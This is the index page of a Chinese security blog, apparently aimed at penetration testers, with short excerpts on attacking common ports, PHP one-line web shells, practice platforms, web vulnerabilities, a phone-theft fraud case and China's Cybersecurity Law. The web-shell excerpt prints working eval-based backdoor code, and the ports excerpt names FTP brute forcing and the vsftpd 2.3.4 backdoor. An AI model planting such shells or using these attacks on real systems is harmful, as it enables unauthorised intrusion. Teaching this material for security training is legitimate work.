欢迎访问HackRed博客,一起沟通,一起学习,一起进步!
最新文章

常见端口渗透总结

21端口 1. 爆破(hydra、msf中的ftp爆破模块) 2. ftp匿名访问:用户名:anonymous 密码:为空或者任意邮箱 3. 后门vsftpd :version2到2.3.4存在后门漏洞,攻击者可以通过该漏洞获取root权限。 unix/ftp/vsftpd_234_backdoor (https://www.fr

常见的一句话木马

PHP一句话:1、普通一句话:123<?php@eval($_POST[123456]);?>*post后面中括号里面的内容是使用菜刀或蚁剑连接时的密码2、防爆破一句话:1234<?phpsubstr(md5($_REQUEST['x']),28)=='6862'&&eva

渗透测试工具资源库

1、漏洞练习平台WebGoat漏洞练习平台:https://github.com/WebGoat/WebGoat webgoat-legacy漏洞练习平台:https://github.com/WebGoat/WebGoat-Legacy zvuldirll漏洞练习平台:https://github.com/710leo/ZVulDril

常见web漏洞(Sql注入、XSS、CSRF)原理以及攻防总结

Sql注入所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。攻击者通过在应用程序预先定义好的SQL语句结尾加上额外的SQL语句元素,欺骗数据库服务器执行非授权的查询,篡改命令。攻击原理:假设的登录查询SELECT * FROM users WHERE login

隐私安全一部手机失窃而揭露的窃取个人信息实现资金盗取的黑色产业链

一部手机失窃而揭露的窃取个人信息实现资金盗取的黑色产业链

作者简介:信息安全老骆驼,10多年网络攻防工作经验,多年金融信息安全服务从业经历。理工直男,不擅文字,一直在信息安全行业默默无闻。近日,由于家人一部手机被盗,自己经历一场与一伙专业老练的利用窃取个人信息盗取他人银行账户资金的犯罪团伙的持续斗争,把这个比作一场战争,显然自己败了,败得没那么惨而已。但以一己之力对抗一个分工明确、手法专业的团伙

HackRed中华人民共和国网络安全法

中华人民共和国网络安全法

《中华人民共和国网络安全法》是为保障网络安全,维护网络空间主权和国家安全、社会公共利益,保护公民、法人和其他组织的合法权益,促进经济社会信息化健康发展制定。由全国人民代表大会常务委员会于2016年11月7日发布,自2017年6月1日起施行。中文名:中华人民共和国网络安全法外文名:People’s Republic of China Net

服务流程

服务流程
用户登录